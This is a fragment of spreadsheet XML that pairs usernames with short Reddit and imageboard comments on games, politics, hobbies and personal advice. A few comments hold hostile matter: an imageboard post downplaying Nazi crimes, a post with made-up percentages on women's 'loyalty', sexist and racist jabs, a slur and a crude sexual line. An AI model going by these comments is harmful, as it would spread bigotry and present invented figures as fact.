    <t>The higher you climb... purple orbs &amp; coalescence become weaker and weaker.... junkrat does nothing in higher elos he gets countered by every hitscan character in the game. Tracer is also in an odd spot in the meta right now, the least of your concerns are the Moira orb. Besides getting killed by the damage orb is just a punish aspect people hate, genji trying to over extend in the back line. Tracer not using her recall properly or bad positioning with blinks. Moira has no utility, if she gets pressured nothing she can do besides fade. The more people spread out Moira becomes weaker as well, she needs to rely on teams being together. Besides tracer can kill Moira in 2 clips, she counters her pretty hard. Especially if she already threw the orb out, you can blink in and even track her fade since blink follows fade like it’s nothing. Moiras damage orb is the least of your worries, not that I’m saying you are but that’s a problem plat and below players might be complaining about</t>
  </si>
  <si>
    <t>&gt;&gt;807309176 in to the anus of a man.</t>
  </si>
  <si>
    <t>TonicThunder</t>
  </si>
  <si>
    <t>This looks fantastic! I think what sticks out to me is that the cabin feels a little too 'perfect' and clean, if that makes sense? Maybe add a little more colorization and distressed look per log, and a little more imperfection in some of the geometry. The back wall logs also feel like they stick out a little too far compared to the front corners. Something to really consider is the trees you have in the background right now. The color of the trees are different, and the size of the trees seem much larger than the cabin. Just some of my personal suggestions, take them as you will! Still love the warmth I get from it!</t>
  </si>
  <si>
    <t>4_the_boys</t>
  </si>
  <si>
    <t>Do you have a special flipping coin???</t>
  </si>
  <si>
    <t>treefarmercharlie</t>
  </si>
  <si>
    <t>Yes! A lot of people here don’t seem to understand that the “LS” in “LST” is for “LOW STRESS”. Not that HST is bad...but people really should know the difference. It’s like they think “LST” just means to tie down branches.</t>
  </si>
  <si>
    <t>BAGP0I</t>
  </si>
  <si>
    <t>There are 2 brand new tops starting to grow. What are you talking about.</t>
  </si>
  <si>
    <t>Sledgemann</t>
  </si>
  <si>
    <t>Fall of a dynasty, and if Empire wins the next PL Finals or losses that but wins SI20 then the birth of an Empire</t>
  </si>
  <si>
    <t>Wackydude1234</t>
  </si>
  <si>
    <t>Is this a normal German thing? I went swimming in Germany and their slide was similar</t>
  </si>
  <si>
    <t>aricbauer</t>
  </si>
  <si>
    <t>Quote: from Nostalgia &gt;&gt; Quote: from DjMischiefManaged &gt;&gt; 3 upgrades for +1 speed https://old.muthead.com/forums/madden/mut-discussion/1517031-for-those-that-have-upgraded-their-coach-madden Ty I dont think you can get plus 1 speed as of yet even with 3 upgrades</t>
  </si>
  <si>
    <t>Thank you for submitting to /r/dankmemes. Unfortunately, your submission has been removed for the following reason(s): --- * Rule XIII - No posts where the title is the meme caption. Please put the caption of the meme in the meme, not in the submission title --- --- *^If ^you ^have ^any ^questions, ^you ^can ^message ^the ^mod ^team ^[here](http://contact.dankmemesreddit.com) ^Replies ^to ^this ^removal ^comment ^may ^not ^be ^answered.* ^(Reposting a removed post without express moderator approval will result in a ban.)</t>
  </si>
  <si>
    <t>loljetfuel</t>
  </si>
  <si>
    <t>The law isn't "no dogs unless they fit in a bag". It's "all dogs must be in a carrier, and a hand-carried bag counts as a carrier". I'm sure they mostly expected small purse dogs to use the bag, but they also got big dogs in big bags. This is fine, even if it's surprising, because the point is to (a) make sure the dogs are under control and (b) reduce the city's liability risk for injuries to pets.</t>
  </si>
  <si>
    <t>Not_A_Cossack</t>
  </si>
  <si>
    <t>It's why I like to group Independents though I guess there is also a difference with someone who quits over antisemtism to someone who's expelled for it. Imagine Williamson would vote for Corbyn as a certainty .</t>
  </si>
  <si>
    <t>Eizzze_BY13</t>
  </si>
  <si>
    <t>I mean how you found the distance from C to A and B? Did u use a formula?</t>
  </si>
  <si>
    <t>DiggingUpTheCorpses</t>
  </si>
  <si>
    <t>That was beautifully written. Coming from a Slipknot fan for over a decade, you fuckin' nailed it on the head.</t>
  </si>
  <si>
    <t>zebra-eds-warrior</t>
  </si>
  <si>
    <t>Good job staying calm in this situation. She crossed many lines and did so many wrong things. But you kept your cool and remaind calm. You deserve a drink (if you drink) after that.</t>
  </si>
  <si>
    <t>IamComradeQuestion</t>
  </si>
  <si>
    <t>And apparently Australia?</t>
  </si>
  <si>
    <t>avEmonsta</t>
  </si>
  <si>
    <t>I’d say you’re more than ready.</t>
  </si>
  <si>
    <t>This submission has been removed as your elaboration was less than 160 characters (roughly two or three standard sized sentences). If you wish to resubmit the post, make sure you include an elaboration/explanation to your post that is has more content. Please read Rule 1 (Correct Formatting) and Rule 6 (Elaborate), and the rest of them while you're at it. Note that Reddit's character count is unreliable as they count spaces, whereas I'm programmed to not count spaces and there's nothing the mods can do about it. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/unpopularopinion) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>Pochend7</t>
  </si>
  <si>
    <t>This is where I throw off weapons at them. The fighter that’s used the greatsword forever... now there is a magical maul, is it worth using?</t>
  </si>
  <si>
    <t>BoukenGreen</t>
  </si>
  <si>
    <t>It was reported his social media was full of antifa and supporting Sanders</t>
  </si>
  <si>
    <t>ignatiusj25</t>
  </si>
  <si>
    <t>took this out for a spin, starting at 4 two stars. 0-5 down to 5 two stars</t>
  </si>
  <si>
    <t>meme_slave_</t>
  </si>
  <si>
    <t>most games (older games) aren't supported and most likely will never be supported so that sucks</t>
  </si>
  <si>
    <t>UnfetteredThoughts</t>
  </si>
  <si>
    <t>Correct me if I'm wrong but isn't it a *fake* 4K? As in it does some funky scaling tricks on things that aren't centered-ish on your display to reduce the load so in reality only a small portion of the view is in 4K and the rest is aggressively scaled.</t>
  </si>
  <si>
    <t>wintermute80</t>
  </si>
  <si>
    <t>Kinda figured you were in the gang. I don't do that many longer rides on them yet, but I've easily kept up with (and surpassed) my wife's ebike on them. Passed a fellow commuter yesterday that was doing 20 like he was standing still. So pavement performance is amazing for a knobby. As to off road, I haven't had this bike out there yet. Hoping to get down to the local lake near our cabin this weekend to hit some dirt. Does great on the wide tires in my work's gravel lot and the few trails I sidetrack to on my commute though. That said, I really like these tires. Speed and cornering are pretty legit on the road.</t>
  </si>
  <si>
    <t>clearkill46</t>
  </si>
  <si>
    <t>It's sold out everywhere for US unfortunately.</t>
  </si>
  <si>
    <t>amin1411</t>
  </si>
  <si>
    <t>&gt;F-Phenibu They don't ship to India.</t>
  </si>
  <si>
    <t>Marshal_M</t>
  </si>
  <si>
    <t>What it fells like when you dont read the patch notes</t>
  </si>
  <si>
    <t>icarrytheone</t>
  </si>
  <si>
    <t>And the losing</t>
  </si>
  <si>
    <t>Kittensandlove123</t>
  </si>
  <si>
    <t>How do I ask a question?</t>
  </si>
  <si>
    <t>turbosexophonicdlite</t>
  </si>
  <si>
    <t>I'm lucky enough to be right near the brewery so I can get it on tap when it comes out again.</t>
  </si>
  <si>
    <t>Tweedilde</t>
  </si>
  <si>
    <t>For cinema sins the logos are bad enough</t>
  </si>
  <si>
    <t>PinguinJoe</t>
  </si>
  <si>
    <t>*GACK* *GACK!* "What the ####?! Why are there esential oils in it?! It's unvacinnated! I am contaminated!"</t>
  </si>
  <si>
    <t>Comrade_Belinski</t>
  </si>
  <si>
    <t>Anarchists are the only larpers on there. I don't act like I'm gonna fight the US military or take on my local police force. I'm just one guy who likes guns, I'm not Rambo. But sure, keep saying im a LARPer because I don't have an AR, great logic loser.</t>
  </si>
  <si>
    <t>Iolanthemarch</t>
  </si>
  <si>
    <t>Queen of charity</t>
  </si>
  <si>
    <t>SanfordSeven</t>
  </si>
  <si>
    <t>I visited the Space Center location here in Houston this past Friday. It was depressing in there - and what little customers I saw were remarking to me and others how it looked like they were going out of business.</t>
  </si>
  <si>
    <t>upsidedownfaceoz</t>
  </si>
  <si>
    <t>I really wanted to like this book, but I just couldn't get through it. It's the only book I've started and just put down. It was quite a while ago, but all I remember is endless tedious pointless lists of things Dorian was doing, and painstaking drawn out descriptions of things that didn't matter.. "Dorian got in to music, so he learned the bassoon, the recorder, the tamborine, air guitar, an old violin that was dark brown and made of maple wood with a cedar inlay and had new strings that were gold in colour , a cello he got from a man from Tibet that had brown hair and green eyes and grew up on a farm and had 3 pet dogs, one brown and two black, one of the black ones being slightly smaller than the other two, the brown one being the eldest ...2 pages later... drums, sitar, a mandolin he got from a flea market from a woman with one leg who earlier that day had been in a minor dispute over the price of pears with a man half her age who was wearing a hat, the bass guitar, lute, clarinet ...another 2 pages... trombone, triangle, french horn, and the keytar. Then he got in to art, so he learned to paint, sketch, engrave, sculpt, silk print..." I was honestly skipping pages at a time just to try to get past this stall, but eventually I gave up. Are we talking about the same book? Am I doing it wrong? I was more excited for this book than most others I've read, so it was a pretty big disappointment.</t>
  </si>
  <si>
    <t>aduanemc</t>
  </si>
  <si>
    <t>I have Bitwig 8-track and I'm spending some time since the announcement to check it out. I haven't gotten too deep yet, but it seems okay. I tried to reverse a midi clip yesterday and couldn't figure out if it was possible. The "modulate anything" feature seems fairly well-executed. And The Grid seems like a total tweak-hole. I use the ctrl+drag stretch feature in Reason quite a bit. Bitwig seems to have a version of that but it's only half-time or double-time. That's a big drawback for me. One of the things I hate to see(props does this constantly, but then they all do, to a degree, it's seeming) is a short-sighted attidude when it comes to implementing the level of control of any feature. You'll see some feature with huge creative potential and then you'll find out it's been hamstringed by a simplified control set because "why would the user ever want to have more than half-time or double-time?" or "why whould the user ever want to have free rates on this effect modulation?" That's why Lectric Panda's stuff is always so good. Rob is always thinking past the line of casual control/feature sets. This promotes exploration, learning, and creative musical growth. That said, Bitwig does have quintuplet and septuplet quantize rates for midi clips. That's pretty cool. I haven't fully explored their note fx section but I did notice that their Diatonic Transposer doesn't offer the ability to set custom scales. It seems like you can kind of get around it with the Transposition Map tool, though. I'll keep exploring and maybe report back in later.</t>
  </si>
  <si>
    <t>ChewyRib</t>
  </si>
  <si>
    <t>Libertarians cannot even make a case for economics</t>
  </si>
  <si>
    <t>FisiWanaFurahi</t>
  </si>
  <si>
    <t>Why is this getting down voted? My first thought was some kind a mild health problem also looking at this guy!</t>
  </si>
  <si>
    <t>Someone_Kashoot_Me</t>
  </si>
  <si>
    <t>They're probably a lot richer</t>
  </si>
  <si>
    <t>carbonskulled</t>
  </si>
  <si>
    <t>Nature of the sport. There is no sport that is truly safe.</t>
  </si>
  <si>
    <t>JML_93</t>
  </si>
  <si>
    <t>Hey everyones situation is different. Maybe he doesn't like his job.</t>
  </si>
  <si>
    <t>G0D_is_Y33T3D</t>
  </si>
  <si>
    <t>Thanks I appreciate it.</t>
  </si>
  <si>
    <t>ITried2</t>
  </si>
  <si>
    <t>How can you disagree with that statement?</t>
  </si>
  <si>
    <t>ImMyztic</t>
  </si>
  <si>
    <t>Going to be a power lineman! Most people don’t think about their electricity going out and when it does, I get called to fix it. *not all hero’s wear capes*</t>
  </si>
  <si>
    <t>newdayagain07</t>
  </si>
  <si>
    <t>that's exactly what i said. their home life is whatever their original ethnicity is. so they may or may not act 100% japanese. the japanese dont know that and they cant screen every single person to make sure they act japanese. if they allow a japanese american to do that job then you can say it has something to do with race but obviously they don't.</t>
  </si>
  <si>
    <t>IILaZyLaMbII</t>
  </si>
  <si>
    <t>Yet the TW3 does acknowledge her as a witcher and she does go around taking contracts on monsters so not technically a witcher but a witcher nonetheless.</t>
  </si>
  <si>
    <t>Gorgehead</t>
  </si>
  <si>
    <t>Holy fuck the Caverns are amazing and Papadosio just absolutely ripped that place up. However, there is something we need to address if The Caverns are going to become a venue as amazing as The Gorge or Red Rocks. The Caverns is in the middle of absolutely nowhere Appalachian Eastern Tennessee. The kind of country where they haven't seen hippies since Vietnam protests. On your way there you drive thru one of the most peaceful and rural parts of the county. They do not want us there. The Caverns also does not allow for camping, even though there is plenty of room. This means that you can either stay in Chattanooga or Nashville (about an hour), a campground about 20 minutes away, a small motel, or some Airbnb situation. The nearby campgrounds and motels will absolutely turn into honeypots for the local good ole boy deputies that will love putting us dirty hippies in handcuffs. There will most definitely be speed traps and check points leaving the venue. Please, please, please have a designated driver and do not smoke pot in your car leaving the venue. If you have been to the venue already then you know how risky these specific parts can be for this kind of crowd. So here's what we do: contact the ownership of the Caverns and tell them that you want to be able to camp there! It will not only make this experience even more fun, but it will help keep our brothers and sisters out of jail. info@thecaverns.com</t>
  </si>
  <si>
    <t>blitzkrieg9</t>
  </si>
  <si>
    <t>Thank buddy. The truth hurts. Anyone who actually read the article and not just the headline will realize this. Current city has basically gone bankrupt trying to support this team. ASU and Phoenix have no interest in going bankrupt (or subsidizing) trying to support the team.... I take the downvotes with pride knowing I am a logical person. But I support the rights if those relying on false hopes and dreams. May they forever ignore reality and pray for a brighter future.</t>
  </si>
  <si>
    <t>Blu Lemmy</t>
  </si>
  <si>
    <t>Quote: Originally Posted by CompleteCount Arrived through the post today... And along with it, something my Missus picked up from eBay for a mere £8... I love that woman's eye for a bargain! I think we can all appreciate it chap. My missus wouldnt know a bargain if if slapped her in the face</t>
  </si>
  <si>
    <t>claustrofucked</t>
  </si>
  <si>
    <t>Yeah, no. Refusing to interact with people who already hated you before they met you because they're racist as fuck is always NTA. Don't see why the fact that they're Asian always makes people here skip over the blatant racism (and sexism in the way they view their daughter).</t>
  </si>
  <si>
    <t>FourChannel</t>
  </si>
  <si>
    <t>&gt; Sure glad I didn't go down that road. Wise choice. Story time ! We just had a new guy quit at work. He was only here for 2.5 months, and for pretty much 2 months, we had to wait for background checks and clearances to vet before giving him a login credential of his own to the systems. I spent my 2 months training him, and I probably was operating at about 1/3 as fast as I would have been without training. K. So 2 months invested in highly technical training, and background checks for federal government systems access, and then poof ! Gone. Said he didn't like (so and so stuffs from internal systems...can't repeat on reddit), and found a new job elsewhere. Me, trying to not be a dick, checked in on him about 1 month after he got his new job... He asks me if he can come back... I say, politely, that the position has been updated with new requirements and the gov agency is looking for someone else now. But internally, I said to myself. Dude... After you pulled that shit.... They are never going to trust you again. They are never going to invest in you again, since there's no indication you won't split the second things hit a bump. They're never going to trust you if you take on a challenge, you won't bail on us and leave the rest of us hanging. ***You, made the right call on that one buddy.***</t>
  </si>
  <si>
    <t>layashout</t>
  </si>
  <si>
    <t>&gt; An impeached Trump who escapes conviction in the Senate after the evidence is laid out in public House hearings will be weaker in 2020 than a Trump who can brag that not even a Democratically controlled House could bring itself to impeach him. And GOP Senators who give him a pass will be easier to defeat than ones who’re spared any need to be counted. This is what Pelosi has been refusing to acknowledge not because the move would actually be politically costly, if anything it would further publicize the crimes that Trump has committed in office such as violating the Emoluments Clause and the numerous conflicts of interest. She is acting in her own interests, not in the interests of the party.</t>
  </si>
  <si>
    <t>TheHellblazer</t>
  </si>
  <si>
    <t>T-Shirt and Jeans Superman where?</t>
  </si>
  <si>
    <t>MutsumidoesReddit</t>
  </si>
  <si>
    <t>They do, but in these situations it’s magically the only one that isn’t called. If you’re lucky you can fight for several weeks and eventually get access. This is less likely as they can safety pressure you won’t get legal aid to challenge them.</t>
  </si>
  <si>
    <t>BusyLight32</t>
  </si>
  <si>
    <t>This whole scenario can be answered with one question: *Do you trust your partner?* That is a tricky question for many people because they bring in their own personal perspective and experiences and also, their perception of the partners friend. You know who doesn't like to their partner to have opposite sex friends? * People that have cheated, or been cheated on - so that is a huge chunk of the population * People who are insecure in their relationship * People who are the jealous type * People who don't have open and honest communication with their partner * Narcissistic and/or controlling people that think they are the only person their partner ever needs</t>
  </si>
  <si>
    <t>iGraveling</t>
  </si>
  <si>
    <t>I didnt realise they were allowed to. Up here at redcliffe we've got god botherers that stick their fiction on stands along the waterfront. My understanding was as long as they didnt harass anyone it was ok, but it seems some go the extra mile in a desperate attempt to convert to their cult.</t>
  </si>
  <si>
    <t>first thing in my lewds folder yo yo was a good day at the amusement park. also got my hoodie which i ordered, nice day</t>
  </si>
  <si>
    <t>kermitlady</t>
  </si>
  <si>
    <t>Hey, me too! I’m a nurse in a skilled nursing facility and work mostly with rehab to home patients. Insurance says no more hospital bed for you and they come to me. I have my routine and like another poster, I’ve found working nights makes tons of things more tolerable. The biggest one being my attitude since I don’t have a million people trying to pull my attention in a bunch of different directions. I keep a report sheet with me with all my patients names and space to write what I need. This stays with me at all times. I can make sure I get everything I need done and have it for reference when I document.</t>
  </si>
  <si>
    <t>still_on_reddit</t>
  </si>
  <si>
    <t>Probably Requiem for a Dream or Mr Nobody.</t>
  </si>
  <si>
    <t>ssaminds</t>
  </si>
  <si>
    <t>this is another big fuck up destroying the one Stark - direwolf bond that has proven long lasting and effective. without ghost Jon would not have been successful.</t>
  </si>
  <si>
    <t>TheJuliaBug</t>
  </si>
  <si>
    <t>See how early you can take the child to childcare at the gym. I started taking my kids when they were just a few months old. I was an exhausted new mom and would sometimes just drop them off and shower because I was too tired to workout. Nowadays I workout at 5:30AM and my husband goes to the gym after work.</t>
  </si>
  <si>
    <t>TotalRats</t>
  </si>
  <si>
    <t>Yes I paid attention and did not leave them alone with the peach. They did not bite its stone ;)</t>
  </si>
  <si>
    <t>RayCow</t>
  </si>
  <si>
    <t>I once managed to launch Jeb into orbit around the sun but that’s about it most of my rockets get all bent and unstable</t>
  </si>
  <si>
    <t>LilithHoping</t>
  </si>
  <si>
    <t>I've been running for 2 years and doing intermittent fasting and keto-ish eating for 5 months. I'm month 4 of HRT. I just hit my goal of 50 lbs weight loss after two years. It worked for me.</t>
  </si>
  <si>
    <t>GlaedrTheDragon</t>
  </si>
  <si>
    <t>Which brawler is the best without star powers</t>
  </si>
  <si>
    <t>cloudsofviolet</t>
  </si>
  <si>
    <t>recs for types of "classic" or staple pieces that will be good for the next few years? seems the drapey minimalist style is out (which I love btw), and I am now confused as to style. apparently 90s is in but also going out? 70s is in, but midi skirts might be going out? just plain confused and need guidance. mostly just wanna not look dated.</t>
  </si>
  <si>
    <t>wfs29223</t>
  </si>
  <si>
    <t>So far so good. But not going to make it yet till I give it a few days.</t>
  </si>
  <si>
    <t>AITAthrowaway8218</t>
  </si>
  <si>
    <t>It’s absolutely not. If you’re going to make this claim, the least you could do it provide a source. Name of article?</t>
  </si>
  <si>
    <t>DFroody</t>
  </si>
  <si>
    <t>JFK. I have a bag that needs checking but idk when checking opens</t>
  </si>
  <si>
    <t>yertart</t>
  </si>
  <si>
    <t>This is the best thing I will ever see.</t>
  </si>
  <si>
    <t>colinaut</t>
  </si>
  <si>
    <t>This article is BS puff piece lacking any scientific rigor at all.</t>
  </si>
  <si>
    <t>SigSig</t>
  </si>
  <si>
    <t>Can y'all fix your busted country? This shit is depressing to read.</t>
  </si>
  <si>
    <t>MrBlueBerryIII</t>
  </si>
  <si>
    <t>The people who spoiled the children.</t>
  </si>
  <si>
    <t>Macabee721</t>
  </si>
  <si>
    <t>Woah someone gave me gold for this?? Hell yeah thank you!</t>
  </si>
  <si>
    <t>balkan_boxing</t>
  </si>
  <si>
    <t>You traveled so many countries and you still don't see the diferences between cultures and the way that some cultures don't work well together. I feel sorry for your ass</t>
  </si>
  <si>
    <t>Lord Bacon</t>
  </si>
  <si>
    <t>Gas hob and electric double oven.</t>
  </si>
  <si>
    <t>saradc14</t>
  </si>
  <si>
    <t>I'm so glad I'm not alone. I was starting to feel lasy. I just can't keep my eyes open tho!</t>
  </si>
  <si>
    <t>&gt;&gt;224316089 You can't get a single reply if you don't start with an inflammatory post or spam the same thread as fast as possible. That's what you retards confuse with "marketing" or "shills".</t>
  </si>
  <si>
    <t>&gt;&gt;221374602 She should distance herself form "muh 1000 dorrar forthwith" So much for Asians understanding math within the macro economy.</t>
  </si>
  <si>
    <t>SaltRole</t>
  </si>
  <si>
    <t>It doesn’t just flash one word, it highlights the most prominent letter in the word and flashes the word, the technique allows you to speed read much more effectively. You can increase/decrease the speed as well until you’re more comfortable with reading at the fastest speed.</t>
  </si>
  <si>
    <t>Win At Life</t>
  </si>
  <si>
    <t>I've heard there are two types of sailors in Galveston bay. Those who HAVE run aground and those who WILL run aground.</t>
  </si>
  <si>
    <t>PenthousePrince</t>
  </si>
  <si>
    <t>I'll be graduating college in december 2020 with over 115k in debt with much of my current balance (~70k) accruing at 8%. I currently have about 11.5k in a savings account that I plan to save for future living expenses, and set aside for an emergency fund. Would it be better for me to dump my savings into my loans now in order to reduce the principal, then slowly build up an emergency fund/savings when I start working after I graduate, or should I keep my savings and focus on paying back loans after graduation? I'm really just trying to figure out the best way to reduce the amount I have to pay back while being financially responsible. At the moment, I'm leaning towards paying off some of my loans with my savings, as I can rely on my parents to support me in terms of living expenses at least for a few months after college. Any advice is appreciated</t>
  </si>
  <si>
    <t>thecheat420</t>
  </si>
  <si>
    <t>Remember when the original Xbox was supposed to be a giant chrome X?</t>
  </si>
  <si>
    <t>Phantaminum</t>
  </si>
  <si>
    <t>UntilThen said: ↑ Happy days for you. That Apex Teton is a heavy weight. You must be very excited. Yeahs it’s going to be fun. I still can’t believe the amp new costs what it does.</t>
  </si>
  <si>
    <t>FIFTHSUN2012</t>
  </si>
  <si>
    <t>Good little chapotraphouse automaton. Follow the borg.</t>
  </si>
  <si>
    <t>Chris R</t>
  </si>
  <si>
    <t>Game Recap: http://udpride.com/forums/showthread...129#post591129 A number of positives. We have more offensive firepower this year. Its mostly freshmen, but they have given us a MAJOR dose of much-needed speed in the offense. Navarro-Leon in the middle will also help us immediately. Defensively we're still shaky at times. The goal we gave up was pretty cheap. Overall though a solid performance and start to the year. Style points arent counted in the openers -- you just want to find a way to win. We did.</t>
  </si>
  <si>
    <t>Mulgikapsad</t>
  </si>
  <si>
    <t>Thanks! It will.</t>
  </si>
  <si>
    <t>AssumedTiger778</t>
  </si>
  <si>
    <t>Why are you making car sounds?</t>
  </si>
  <si>
    <t>Hi, readerseven. We know it is hard to remember all the various rules for different subreddits, but your submission has been removed because standalone images are not allowed in /r/environment. They need to be embedded in an article providing additional information. Please review the rules in our sidebar. And check out the other reddits we have listed, including those in the [Big List of Related Reddits](http://www.reddit.com/r/environment/wiki/related_reddits) - you might find a better place for this submission. Thanks for understanding. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/environment) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>Imakedo</t>
  </si>
  <si>
    <t>If you read through a few comments it's quick to see it's a native peccary and not a destructive razorback. https://en.wikipedia.org/wiki/Peccary Presumably he was part of a group hunting feral hogs and was showing his mates what not to kill.</t>
  </si>
  <si>
    <t>BloodAwaits</t>
  </si>
  <si>
    <t>The voting system is there as a "checks and balances" system to ensure that Jagex doesn't irreparably damage the game. Even then, what incentive could you possible have to vote no? It literally doesn't affect you, it's purely to spite others. At a 75% pass rate requirement, voting against anything you don't personally partake in almost ensures every update wouldn't pass. It's lucky most people don't vote in that way.</t>
  </si>
  <si>
    <t>Martianspirit</t>
  </si>
  <si>
    <t>Steel with its higher heat resistance will make that easier than with the Falcon booster as well. We will see if it needs a reentry burn or if it can do it with a longer glide path like New Glenn. I understand that Starship will stage even lower and slower than Falcon. That too should make it easier. It is all optimized for RTLS, not downrange landing.</t>
  </si>
  <si>
    <t>Portal2TheMoon</t>
  </si>
  <si>
    <t>Okay cool. Im glad the reddit is more reliable then the offical site lmao. On forhonorgame.com/status under says everything is all good</t>
  </si>
  <si>
    <t>msmaynards</t>
  </si>
  <si>
    <t>30"? How long does it take to get to that point? You might want to set a weekly reminder to take care of it before it gets to be such a burden. I get my stack and sit down on the patio in fresh air with the recycling basket next to me. Open, drop whole sheets and envelopes into recycling, rip personal info off stuff I don't need to keep, personal stuff waits shredding, drop the rest into recycling and and make a file pile. Usually I only have a couple inches to do and when done I shred the personal stuff then put filing away. If I'm going through all my paper and it will take an hour or so I do this for 10-20 minutes until I estimate the shredding pile is at the limit for the shredder, use shredding as a short break then back to work. What I do for incoming is have a file in the front of my file box as an inbox with a basket next to it for shredding. I may or may not open the mail immediately, put the obvious stuff in recycling, shredding basket and inbox. As I pay the bills I rip off the stuff that needs to be shredded and put into shredding basket and the rest into recycling. When 'inbox' is getting bulky I pull it, the shredding basket, shredder and recycling basket out and take care of it. When I put all the gear away I file the papers I'm keeping. I've gone paper free for a lot of stuff and it's helped. Some bills resist paper free for some reason but I still pay them online. I should get on it, there has to be a way! The mini in box helps as I get anxious when it gets overfull. Too full for a regular hanging file is only a couple inches and a couple inches doesn't take long to deal with.</t>
  </si>
  <si>
    <t>bskinnyyy</t>
  </si>
  <si>
    <t>Love this monitor. Was a little iffy on it because there wasn\u2019t a ton of reviews on it. But I absolutely love it. The picture is great and I can\u2019t recommend ultra wide enough. \n \n</t>
  </si>
  <si>
    <t>SociallyDeadOnReddit</t>
  </si>
  <si>
    <t>That could’ve been a sitcom episode until the last bit.</t>
  </si>
  <si>
    <t>McCheeryJJ</t>
  </si>
  <si>
    <t>Happened today actually! Chucked a small glass bottle on the floor, it smashed, continued to pick it up with my HANDS and prick my finger. Damn.</t>
  </si>
  <si>
    <t>Anonymous0212</t>
  </si>
  <si>
    <t>Why don’t your feelings matter? If you’re this uncomfortable, if you’ve been stuck in this pattern that clearly doesn’t work for you, why would it make you a horrible person to take care of yourself by breaking up with someone who clearly isn’t mature enough to have a healthy relationship? *Set higher standards for yourself, you have every right to do that, it’s your life!*</t>
  </si>
  <si>
    <t>crystal__pepsi</t>
  </si>
  <si>
    <t>Personally, I'd rather be away from people and do my thing instead of having them ruin things for me. I have a fun only policy with almost all of my friends. It's like, I dont give you drama and therefore i dont take drama from you. I don't mean to say I'd walk out on a friend who genuinely needs help, but if someones going down and trying to take you down with them, nah uh. Not letting that happen.</t>
  </si>
  <si>
    <t>spider-ball</t>
  </si>
  <si>
    <t>I'm hoping the joke in this arc is Zoro nevers to lay a finger on Nidai Kitetsu, and then Shodai is dropped into his lap later.</t>
  </si>
  <si>
    <t>Neith74</t>
  </si>
  <si>
    <t>I didn’t know if it’s a beta thing or not..</t>
  </si>
  <si>
    <t>RedGhosty7507</t>
  </si>
  <si>
    <t>The crusades didn't convert anyone. Screw the Roman church!</t>
  </si>
  <si>
    <t>ebil_lightbulb</t>
  </si>
  <si>
    <t>Is there any reason you can think of that made you feel that way? I have a daughter and I'm terrified that she'll just end up hating me at some point. My mother and I always had a best friend relationship but her and my sister would have fist fights. I don't know what the difference was and I know it could just be a personality difference but if you have any tips that could have helped you in your situation, I'd love to hear it.</t>
  </si>
  <si>
    <t>&gt;&gt;119539097 If you could witness the depravity and ruthlessness of Soviet and American soldiers in WWII and compare their actions to the Nazis, you would be running into the arms of the Nazis. But of course you wouldn't be interested in a movie about the rape of Berlin or the rheinweisenlager (allied death camps). Your only concern is being accepted by other people as part of the "in-group."</t>
  </si>
  <si>
    <t>_Last_Man_Standing_</t>
  </si>
  <si>
    <t>If you are a HMV male with strong frame and: &gt;If you get a virgin the chances she'll be loyal are 70% It drops by 10% next 2 dicks she took And it drops by another 25% for every dick after that ^(I have no empiric evidence for this. It's just my opinion based on experience.)</t>
  </si>
  <si>
    <t>RyGuyTheGingerGuy</t>
  </si>
  <si>
    <t>I found it campy and overrated but to each their own</t>
  </si>
  <si>
    <t>rembrandt_q_1stein</t>
  </si>
  <si>
    <t>Really? I only mentioned you in the first item!</t>
  </si>
  <si>
    <t>nachtduivel</t>
  </si>
  <si>
    <t>If distortion weapons were working that would take pretty hefty chunks out of shields too :)</t>
  </si>
  <si>
    <t>rjbradley</t>
  </si>
  <si>
    <t>Wait until this guy learns Sumerians were not only making olive oil, but had investigators for counterfeit olive oil</t>
  </si>
  <si>
    <t>Pure_Catholic</t>
  </si>
  <si>
    <t>tHey'Re RicH, ThEy cAn sTep OVeR uS BeCAusE tHeY WorKEd hArDer tHan Us</t>
  </si>
  <si>
    <t>WyldStallynz89</t>
  </si>
  <si>
    <t>Anyone know if you can play it in VR without the move controllers? I have enough cash to pick up a PSVR bundle without them, and can buy them separately later if need be but I'd be super disappointed if I couldn't play on vr with just my DualShock.</t>
  </si>
  <si>
    <t>theal_mighty_spek</t>
  </si>
  <si>
    <t>r/eyebleach</t>
  </si>
  <si>
    <t>Laura</t>
  </si>
  <si>
    <t>There was a misunderstanding with the booking and they booked our room for one of the nights we were supposed to stay there. They solved offering us a better room for that night, turning out good for us. It was just 2$ away from PUB st. Stayed in August 2019</t>
  </si>
  <si>
    <t>Unicorn-Ninja</t>
  </si>
  <si>
    <t>Hold on to me Cos I’m a little unsteady</t>
  </si>
  <si>
    <t>Granny_knows_best</t>
  </si>
  <si>
    <t>Is that a curved monitor? As a gamer, this might be the most coziest of all cozy rooms ive seen here.</t>
  </si>
  <si>
    <t>Nicole</t>
  </si>
  <si>
    <t>2 x pre/postnatal belly bands. One medium size and one small size. Great for days when you feel like you need extra support during pregnancy and for assisting with DRAM issues postnatal.</t>
  </si>
  <si>
    <t>michaelwrightmw</t>
  </si>
  <si>
    <t>Use it to study people try understand why people do what they do</t>
  </si>
  <si>
    <t>romeo2424</t>
  </si>
  <si>
    <t>Would you be able to draw me something?</t>
  </si>
  <si>
    <t>BigDickDominick</t>
  </si>
  <si>
    <t>In mocks, so far at pick 8 in a 10 team PPR, I got Hopkins&gt;Kelce&gt;Chubb&gt;Kerryon Johnson&gt; Woods&gt;Ridley&gt;Coleman&gt;Shepard&gt;Henderson and after that just see what sticks.</t>
  </si>
  <si>
    <t>WeR0206</t>
  </si>
  <si>
    <t>LionDeNittany said: ↑ It has to do with the absurd claim that Clinton was on the plane 27 times with no SS detail and underage girls. Follow along please. LdN Click to expand... I never said he flew 27 times without SS and with minor girls. Follow along please. You’re being an ass.</t>
  </si>
  <si>
    <t>DangZagnut</t>
  </si>
  <si>
    <t>Feminism, is standing around whining waiting for a man to save them.</t>
  </si>
  <si>
    <t>aokeefe13</t>
  </si>
  <si>
    <t>I haven’t been on social media so I’m late to the party lol. This makes me so happy thank you for sharing!! ❤️❤️❤️</t>
  </si>
  <si>
    <t>LiterallyYuki</t>
  </si>
  <si>
